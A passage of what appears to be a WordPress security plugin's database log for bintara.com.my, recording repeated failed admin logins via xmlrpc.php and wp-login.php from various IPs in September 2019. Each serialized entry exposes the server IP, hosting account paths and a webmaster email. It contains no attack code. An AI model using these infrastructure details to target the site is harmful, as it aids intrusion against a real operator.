empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.105.41\";s:11:\"REMOTE_PORT\";s:5:\"32878\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXEWj9WdmWKlpmZuecwPAwAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567692431.5289\";s:12:\"REQUEST_TIME\";s:10:\"1567692431\";}}','notice','2019-09-05 14:07:12','2019-09-05 14:07:11',18206416,19502960,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.105.41'),(23663,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"19252\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXFLTl3ya0q1MiNGIBPY-wAAAVU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567705934.5155\";s:12:\"REQUEST_TIME\";s:10:\"1567705934\";}}','notice','2019-09-05 17:52:15','2019-09-05 17:52:14',17746200,19236008,'https://bintara.com.my/wp-login.php',1,0,'142.93.113.182'),(23664,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"20198\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXFLU0nYSdp0nkeI124GPwAAAQc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567705939.2847\";s:12:\"REQUEST_TIME\";s:10:\"1567705939\";}}','notice','2019-09-05 17:52:20','2019-09-05 17:52:19',18260288,19555856,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.113.182'),(23665,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-05 20:17:16','2019-09-05 20:17:14',17706328,18170000,'https://bintara.com.my/dell-large-displays/',1,0,'157.55.39.191'),(23666,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.182.210.19\";s:11:\"REMOTE_PORT\";s:5:\"57352\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXGL9TyDDAHJuEsVgV3LEgAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567722486.0722\";s:12:\"REQUEST_TIME\";s:10:\"1567722486\";}}','notice','2019-09-05 22:28:07','2019-09-05 22:28:06',17747056,19238160,'https://bintara.com.my/wp-login.php',1,0,'5.182.210.19'),(23667,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.182.210.19\";s:11:\"REMOTE_PORT\";s:5:\"57742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXGL@DyDDAHJuEsVgV3LFgAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567722488.7907\";s:12:\"REQUEST_TIME\";s:10:\"1567722488\";}}','notice','2019-09-05 22:28:10','2019-09-05 22:28:09',18261472,19558176,'https://bintara.com.my/xmlrpc.php',1,0,'5.182.210.19'),(23668,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.86.209\";s:11:\"REMOTE_PORT\";s:5:\"56756\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXHxNF@jee@98JvYAq4aIgAAAQ4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567748404.3905\";s:12:\"REQUEST_TIME\";s:10:\"1567748404\";}}','notice','2019-09-06 05:40:05','2019-09-06 05:40:04',17743240,19234736,'https://bintara.com.my/wp-login.php',1,0,'166.62.86.209'),(23669,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.86.209\";s:11:\"REMOTE_PORT\";s:5:\"57064\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXHxN1@jee@98JvYAq4aJAAAAQ8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567748407.3621\";s:12:\"REQUEST_TIME\";s:10:\"1567748407\";}}','notice','2019-09-06 05:40:08','2019-09-06 05:40:07',18258120,19555368,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.86.209'),(24905,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"92.53.114.87\";s:11:\"REMOTE_PORT\";s:5:\"43164\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG1Aa1FqYKvioG46Y4mkAAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568781569.3179\";s:12:\"REQUEST_TIME\";s:10:\"1568781569\";}}','notice','2019-09-18 04:39:30','2019-09-18 04:39:29',18260904,19560824,'https://bintara.com.my/xmlrpc.php',1,0,'92.53.114.87'),(24906,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.29.98\";s:11:\"REMOTE_PORT\";s:5:\"58078\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYG1n61FqYKvioG46Y4m6QAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568781727.9917\";s:12:\"REQUEST_TIME\";s:10:\"1568781727\";}}','notice','2019-09-18 04:42:09','2019-09-18 04:42:08',17741512,19232744,'https://bintara.com.my/wp-login.php',1,0,'68.183.29.98'),(24907,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: 